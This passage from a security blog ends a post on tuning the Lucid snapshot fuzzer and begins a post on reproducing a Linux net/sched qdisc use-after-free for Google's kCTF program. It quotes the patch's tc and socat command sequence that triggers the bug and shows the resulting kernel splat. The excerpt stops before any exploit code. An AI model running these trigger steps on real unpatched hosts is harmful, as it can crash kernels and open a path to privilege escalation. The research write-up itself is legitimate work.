<p>Some of the previous runs had absolutely exploded the corpus size, for instance in Stage 2 we had accumulated over 300k inputs in the corpus. I wanted to try and cut down on this bloat where possible because my intuition was that we were saving too many inputs. By default, Lucid would save an input if it discovered what it considered a new edge pair, e.g., a new basic block transition. It would also save an input if it reached an edge pair a record number of times; that count is called a hitcount. I bucket the hitcounts like AFL++ does:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// After a fuzzing iteration, Bochs will have updated the curr_map with</span>
    <span class="cd">/// hit counts for each edge pair that was reached during that fuzzing</span>
    <span class="cd">/// iteration. Instead of keeping the hit counts literal, we instead "bucket"</span>
    <span class="cd">/// the hit counts into categories. So for instance if we hit an edge pair</span>
    <span class="cd">/// 19 times, it will be placed in the 32 hitcount bucket. This algorithm</span>
    <span class="cd">/// is stolen directly from AFL++ who obviously has a ton of empirical</span>
    <span class="cd">/// evidence showing that this is beneficial</span>
    <span class="nd">#[inline(always)]</span>
    <span class="k">fn</span> <span class="nf">bucket</span><span class="p">(</span><span class="n">hitcount</span><span class="p">:</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u8</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">hitcount</span> <span class="p">{</span>
            <span class="mi">0</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="mi">1</span> <span class="k">=&gt;</span> <span class="mi">1</span><span class="p">,</span>
            <span class="mi">2</span> <span class="k">=&gt;</span> <span class="mi">2</span><span class="p">,</span>
            <span class="mi">3</span> <span class="k">=&gt;</span> <span class="mi">4</span><span class="p">,</span>
            <span class="mi">4</span><span class="o">..=</span><span class="mi">7</span> <span class="k">=&gt;</span> <span class="mi">8</span><span class="p">,</span>
            <span class="mi">8</span><span class="o">..=</span><span class="mi">15</span> <span class="k">=&gt;</span> <span class="mi">16</span><span class="p">,</span>
            <span class="mi">16</span><span class="o">..=</span><span class="mi">31</span> <span class="k">=&gt;</span> <span class="mi">32</span><span class="p">,</span>
            <span class="mi">32</span><span class="o">..=</span><span class="mi">127</span> <span class="k">=&gt;</span> <span class="mi">64</span><span class="p">,</span>
            <span class="mi">128</span><span class="o">..=</span><span class="mi">255</span> <span class="k">=&gt;</span> <span class="mi">128</span><span class="p">,</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>So, if the current hitcount record on an edge pair is 4 and a new input achieves a hitcount of 5, we don’t save it, because both values land in the same bucket. But if that input were to achieve a hitcount of 8, placing it in a new bucket, it would get saved. The ratio of these hitcount-record-setting inputs to edge-pair-discovery inputs was easily more than 10 to 1 and I felt like, especially early in the campaign, they were kind of just noise and not extremely helpful.</p>

<p>What I moved to was a model where I only considered new hitcount records if we were “starved” for new coverage. I created a command line option to set the “starved for coverage” threshold in wall-clock time, so once the fuzzer goes that long without finding new coverage, it starts saving hitcount record inputs to the corpus. During our longest fuzzing campaign, with the threshold set to an hour, we reached the starved state multiple times, and saving these types of inputs seemed beneficial at that point as they soon after found new coverage.</p>
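
<p>The gating logic can be sketched as follows. This is a Python approximation, not Lucid’s code: <code class="language-plaintext highlighter-rouge">bucket</code> mirrors the Rust function above, while the <code class="language-plaintext highlighter-rouge">SavePolicy</code> class, its method names, and the injectable <code class="language-plaintext highlighter-rouge">now</code> parameter are hypothetical.</p>

```python
import time


def bucket(hitcount: int) -> int:
    """Python mirror of the Rust bucket() above (hitcount is 0..=255)."""
    if hitcount <= 2:
        return hitcount
    if hitcount == 3:
        return 4
    if hitcount <= 7:
        return 8
    if hitcount <= 15:
        return 16
    if hitcount <= 31:
        return 32
    if hitcount <= 127:
        return 64
    return 128


class SavePolicy:
    """Save hitcount-record inputs only after a coverage drought (hypothetical)."""

    def __init__(self, starved_after_secs: float):
        self.starved_after_secs = starved_after_secs
        self.last_new_edge = time.monotonic()

    def should_save(self, new_edge: bool, new_hitcount_record: bool, now=None) -> bool:
        now = time.monotonic() if now is None else now
        if new_edge:
            # New edge pairs are always saved and reset the starvation clock.
            self.last_new_edge = now
            return True
        starved = (now - self.last_new_edge) >= self.starved_after_secs
        return new_hitcount_record and starved
```

<p>With a threshold of 3600 seconds, an input that only sets a new hitcount bucket is dropped while edges are still being found and kept once an hour has passed without a new edge.</p>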

<h3 id="corpus-sampling">Corpus Sampling</h3>
<p>In another effort to avoid corpus bloat, I moved from a model where every fuzzer gets every other fuzzer’s entire corpus every sync-interval (tunable at runtime via command line), to a model where every fuzzer would instead randomly sample inputs from other fuzzers for the entirety of the sync-interval before it would put them all back on disk and randomly pick more to sample. For my longest campaign I set this sync interval to 1 hour.</p>

<h3 id="corpus-biasing">Corpus Biasing</h3>
<p>Lastly, I decided to play with how the corpus would provide inputs to the mutator. I implemented a couple of methods: <code class="language-plaintext highlighter-rouge">get_input_uniform</code> and <code class="language-plaintext highlighter-rouge">get_input_bias_new</code>. The former would just randomly select an input from the corpus with uniform distribution (including the sampled inputs) and the latter would bias the newer inputs in the corpus by a tunable rate. For my longest campaign I set it so that around 67% of the time, we’d pick a new input. Sampled inputs from other fuzzers were considered “new” as well in this due to the way I implemented the sampling. I have to say, I don’t think this made a bit of difference in our progress. I think over a long enough time horizon it probably doesn’t matter much.</p>
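
<p>As a rough illustration of the two selection methods, here is a Python sketch. The function names come from the post, but the signatures are invented: in particular, splitting the corpus into explicit <code class="language-plaintext highlighter-rouge">old</code> and <code class="language-plaintext highlighter-rouge">new</code> lists is an assumption, since how Lucid decides which inputs count as “new” isn’t covered here.</p>

```python
import random


def get_input_uniform(corpus: list, rng: random.Random):
    """Pick any corpus input with equal probability."""
    return rng.choice(corpus)


def get_input_bias_new(old: list, new: list, rng: random.Random, bias: float = 0.67):
    """Pick from the `new` inputs roughly `bias` of the time, else from `old`.

    Falls back to whichever list is non-empty so a fresh or fully aged
    corpus still yields an input.
    """
    if new and (not old or rng.random() < bias):
        return rng.choice(new)
    return rng.choice(old)
```

<p>Note that with a fixed bias, each individual new input gets picked far more often than each old one whenever the new set is small, which is the intended effect of the bias.</p>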

<p>We ended up setting a substantial edge-finding record in just 15h of wall-clock time and under 2 million iterations.</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-25 21:22:08)]
globals: uptime: 0d 15h 47m 18s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 1.923M | iters/s: 27.05 | iters/s/f: 3.38
cpu: target: 97.7% | reset: 2.2% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 25866 | last find: 0h 4m 5s | map: 39.47%
snapshot: dirty pages: 9536 | dirty / total: 0.00169% | reset memcpys: 1475
corpus: inputs: 15689 | corpus size (MB): 44.976 | max input: 0x10088
</code></pre></div></div>

<p>So with all of the improvements over time we were able to go from 17k edges in 90 million iterations to 26k edges in 2 million iterations. I think the biggest positive change was probably just using seeds. I don’t think much of the core fuzzer tweaking (reducing corpus bloat, sampling inputs, avoiding hitcount inputs) made too much of a difference.</p>

<h2 id="conclusions">Conclusions</h2>
<h3 id="in-general">In General</h3>
<ul>
  <li>New snapshot method worked well and continued to be performant deep into campaign with thousands of dirty pages to reset</li>
  <li>Bochs emulation is the main bottleneck in the fuzzer, you probably need quite a bit of hardware to reach coverage saturation for complex targets</li>
  <li>Redqueen provided some huge boosts in edge discovery, but it needs a longer campaign to be beneficial</li>
  <li>Corpus bloat reduction didn’t massively affect the fuzzer, at least on our 4 day campaign, it seems benign enough to keep</li>
  <li>Biasing towards newer inputs didn’t seem to help the fuzzer find edges more efficiently</li>
  <li>Re-architecting mutators to be plug and play was a huge improvement, now creating a fuzzer is as easy as implementing a custom Mutator</li>
  <li>High-quality seeds are the easiest way to massively boost efficiency</li>
</ul>

<h3 id="per-stage">Per Stage</h3>
<ul>
  <li>Stage 1: High iteration count (88M) but only 16,917 edges - inefficient due to malformed, easily rejected inputs</li>
  <li>Stage 2: Dramatic efficiency gain - 17,740 edges in only 2.8M iterations (~35x more efficient)</li>
  <li>Stage 3: Broken Redqueen severely hurt performance - only 370K iterations in 14 hours</li>
  <li>Stage 4: Fixed Redqueen restored throughput, rare but massive edge discovery gains</li>
  <li>Stage 5: Seeds + optimizations achieved best results - 25,866 edges in 1.9M iterations</li>
</ul>

<h3 id="caveats">Caveats</h3>
<ul>
  <li>Fuzzing is extremely random, none of these results should be taken at face value besides massive 2-10x improvements</li>
  <li>Fuzzing is highly target dependent. Biasing towards new inputs, our corpus sampling interval, ignoring hit-counts, and reducing corpus bloat didn’t seem to have a massive negative effect with this specific target, but may be massively beneficial or harmful against others</li>
  <li>Ideally I would’ve created line graphs documenting coverage for each stage, but I didn’t have the presence of mind to do that, I apologize</li>
</ul>

<h2 id="whats-next">What’s Next?</h2>
<p>Now with the first fuzzing journey out of the way and some of the core features improved/fixed, we can move onto more earnest bug hunting. Next blog series we will pick a single target (instead of 4 like in this episode) and iterate on a purpose-built mutator again hoping to find bugs. We will do all of the things you do when you’re fuzzing for bugs: create good seeds, visualize coverage, find roadblocks, iterate on mutator, scale the fuzzing workload to many cores, etc.</p>

<p>Repo-wise I hope to clean up my local version this weekend and then find a way to standardize the build process of the entire thing, maybe we’ll Dockerize it I’m not sure yet.</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Linux" /><category term="Kernel" /><category term="Netlink" /><summary type="html"><![CDATA[Background We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.]]></summary></entry><entry><title type="html">Patch-Gapping the Google Container-Optimized OS for $0</title><link href="https://h0mbre.github.io/Patch_Gapping_Google_COS/" rel="alternate" type="text/html" title="Patch-Gapping the Google Container-Optimized OS for $0" /><published>2025-02-13T00:00:00+00:00</published><updated>2025-02-13T00:00:00+00:00</updated><id>https://h0mbre.github.io/Patch_Gapping_Google_COS</id><content type="html" xml:base="https://h0mbre.github.io/Patch_Gapping_Google_COS/"><![CDATA[<h2 id="background">Background</h2>
<p>I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from <code class="language-plaintext highlighter-rouge">/net/sched</code> so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bc50835e83f60f56e9bec2b392fb5544f250fb6f">here</a>. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.</p>

<p>I checked and discovered that at the time I found the patch the COS 105 instance in kCTF was still vulnerable to this bug. I stopped looking then, but lesson learned, the LTS instance was also still vulnerable. I don’t know exactly how the rules work, but this bug was exploited as a 0day entry as per the public kCTF responses spreadsheet in December, but at the time I started working on it, there were no patch links in the spreadsheet for this bug and the instances remained unpatched.</p>

<p>At this point I started trying to figure out the bug and possibly exploit it. My goal was to patch-gap the COS 105 instance with a 1day entry. Shortly after I began investigating the bug, a new release was announced, but luckily the new instances would be vulnerable as well as they had also not been patched. Since the COS 105 slot was unexploited, and the upcoming COS 105 instance would also be vulnerable, I mistakenly took this as a signal to not rush as the instance would probably remain unexploited while I worked on the project slowly. In hindsight, I should’ve worked harder on this as the COS 105 instance was exploited a few hours before I finished. It may be moot anyways since the bug was exploited previously in the program as a 0day, still not sure about that. Anyways, I encountered some self-inflicted roadblocks that really hindered my progress, we’ll get into those. Next time I’ll work harder and dedicate more time to the effort instead of just a few hours here and there at night.</p>

<h2 id="patch-analysis">Patch Analysis</h2>
<p>The patch text is very descriptive and provides a nice proof-of-concept to reproduce the buggy condition:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">net: sched: Disallow replacing of child qdisc from one parent to another
Lion Ackermann was able to create a UAF which can be abused for privilege
escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 limit 1000p
 qdisc drr 3: dev lo parent 1:2

step10. trigger the bug &lt;=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 1:3 root leaf 4: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
 qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.
There can only be one parent.  b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12.  send one packet to plug
</span><span class="gp">echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$</span><span class="o">((</span>0x10001<span class="o">))</span>
<span class="go">step13.  send one packet to the grafted fifo
</span><span class="gp">echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$</span><span class="o">((</span>0x10003<span class="o">))</span>
<span class="go">
step14. lets trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not
a delete from one node(3:1) and add to another node (1:3) as in step10.
While we could "fix" with a more complex approach there could be
consequences to expectations so the patch takes the preventive approach of
"disallow such config".
</span></code></pre></div></div>

<p>The bug here is that a qdisc can be “re-parented” to a class that is not its original parent. This kind of logic was not intended. When you create these types of classes that can have qdiscs attached, a default qdisc is allocated and you can graft a new qdisc to the class afterwards to replace the current qdisc. So you can see that <code class="language-plaintext highlighter-rouge">class 3:1</code> is first created in step 7 and then we graft a qdisc onto it in step 8. This will free the default qdisc and instantiate this one in its place and attach it to the class.</p>

<p>The bug, however, lets you graft that qdisc (handle 4:0) onto a different class using the same grafting mechanism that we used on 3:1, so the same qdisc ends up grafted onto two classes. The patch points out the side effects of this bug are basically this:</p>
<ol>
  <li>From qdisc 4:0’s point of view, its parent is still class 3:1, that is never changed</li>
  <li>From class 3:1’s perspective, qdisc 4:0 is still its child qdisc</li>
  <li>From class 1:3’s perspective, qdisc 4:0 is now its child qdisc</li>
  <li>The refcount on the qdisc is now 2: 1 from the initial graft onto 3:1 and another 1 from the re-parent graft onto 1:3</li>
</ol>

<p>So those are the side effects the bug produces. At this point, I didn’t know a single thing about <code class="language-plaintext highlighter-rouge">/net/sched</code>, classes, qdiscs, etc, so the learning curve during this process was steep. I had never dealt with this subsystem before in my life. But after a lot of Googling and ChatGPTing, I was able to reproduce the PoC in the patch with the <code class="language-plaintext highlighter-rouge">tc</code> utility just as the patch specifies. I went through all the steps and when I got to step 14 and it was time to trigger the UAF, I got the following splat after deleting class 1:3:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   10.519000] ------------[ cut here ]------------
</span><span class="gp">[   10.521778] list_del corruption, ffff8fdd50a008d0-&gt;</span>next is NULL
<span class="go">[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
</span><span class="gp">[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #</span>1
<span class="go">[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
</span><span class="gp">[   10.600704]  &lt;TASK&gt;</span><span class="w">
</span><span class="go">[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
</span><span class="gp">[   10.699977]  &lt;/TASK&gt;</span><span class="w">
</span><span class="go">[   10.701360] ---[ end trace 8e001f66f1703586 ]---
</span></code></pre></div></div>

<p>At this point I was excited because I thought I had recreated the bug and caused a UAF, and that I’d soon be looking for ways to exploit it; however, I was extremely wrong. All this splat amounts to is a warning that there was an invalid <code class="language-plaintext highlighter-rouge">list_del</code> operation. In my development environment, this was enough to cause a kernel panic. I had KASAN enabled, so if there had been a UAF I would’ve seen a different splat, and now I was very confused. On further inspection, I never even reached the step where I delete class 1:1 as in the PoC, so what is going on? Why does my PoC stop here on this <code class="language-plaintext highlighter-rouge">list_del</code> operation? Time to dig into the details.</p>

<p>First, why do we even encounter a bad <code class="language-plaintext highlighter-rouge">list_del</code> operation? We still don’t know much about this bug or subsystem yet. I had basically just recreated the PoC in the patch and had done almost zero critical thinking of my own. After a lot of <code class="language-plaintext highlighter-rouge">printk</code> debugging, I finally figured out where the invalid <code class="language-plaintext highlighter-rouge">list_del</code> comes from.</p>

<h2 id="list-bug-analysis">List Bug Analysis</h2>
<p>First of all, why is <code class="language-plaintext highlighter-rouge">list_del</code> complaining? Well, it turns out that a common kernel configuration is <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code>, which turns the list manipulation APIs, like <code class="language-plaintext highlighter-rouge">list_del</code>, into more careful versions of themselves. <code class="language-plaintext highlighter-rouge">list_del</code>’s job is to remove a <code class="language-plaintext highlighter-rouge">list_head</code> node from a linked list. If you can visualize a linked list in the kernel, it’s essentially a list of nodes. Each node contains a <code class="language-plaintext highlighter-rouge">prev</code> and a <code class="language-plaintext highlighter-rouge">next</code> pointer that reference the previous and the next node in the list, respectively. So the debug list configuration has some sanity checks that make sure that when you go to remove a node from a list, there hasn’t been any corruption of the node itself. When we delete class 1:3, something happens during that process and we end up here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__list_del_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">__list_del_entry_valid</span><span class="p">(</span><span class="n">entry</span><span class="p">))</span>
		<span class="k">return</span><span class="p">;</span>

	<span class="n">__list_del</span><span class="p">(</span><span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">,</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Things are going awry in the <code class="language-plaintext highlighter-rouge">__list_del_entry_valid</code> check it seems:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
 * Performs list corruption checks before __list_del_entry(). Returns false if a
 * corruption is detected, true otherwise.
 *
 * With CONFIG_LIST_HARDENED only, performs minimal list integrity checking
 * inline to catch non-faulting corruptions, and only if a corruption is
 * detected calls the reporting function __list_del_entry_valid_or_report().
 */</span>
<span class="k">static</span> <span class="n">__always_inline</span> <span class="n">bool</span> <span class="nf">__list_del_entry_valid</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">bool</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">IS_ENABLED</span><span class="p">(</span><span class="n">CONFIG_DEBUG_LIST</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">prev</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">next</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

		<span class="cm">/*
		 * With the hardening version, elide checking if next and prev
		 * are NULL, LIST_POISON1 or LIST_POISON2, since the immediate
		 * dereference of them below would result in a fault.
		 */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">==</span> <span class="n">entry</span> <span class="o">&amp;&amp;</span> <span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">==</span> <span class="n">entry</span><span class="p">))</span>
			<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">ret</span> <span class="o">&amp;=</span> <span class="n">__list_del_entry_valid_or_report</span><span class="p">(</span><span class="n">entry</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Which in turn calls <code class="language-plaintext highlighter-rouge">__list_del_entry_valid_or_report</code> because we do indeed have <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code> enabled:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bool</span> <span class="nf">__list_del_entry_valid_or_report</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">prev</span><span class="p">,</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>

	<span class="n">prev</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">;</span>
	<span class="n">next</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;next is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">entry</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;prev is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">entry</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="n">LIST_POISON1</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;next is LIST_POISON1 (%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">LIST_POISON1</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span> <span class="o">==</span> <span class="n">LIST_POISON2</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;prev is LIST_POISON2 (%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">LIST_POISON2</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">!=</span> <span class="n">entry</span><span class="p">,</span>
			<span class="s">"list_del corruption. prev-&gt;next should be %px, but was %px. (prev=%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">,</span> <span class="n">prev</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">!=</span> <span class="n">entry</span><span class="p">,</span>
			<span class="s">"list_del corruption. next-&gt;prev should be %px, but was %px. (next=%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">,</span> <span class="n">next</span><span class="p">))</span>
		<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>

	<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So what’s going on? We don’t know much about the <code class="language-plaintext highlighter-rouge">/net/sched</code> code yet, but it appears that because we have <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code>, there is a check on the node you want to remove from the list. If you had the following linked list:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">A -&gt;</span><span class="w"> </span>B -&gt; C -&gt; D -&gt; A
</code></pre></div></div>
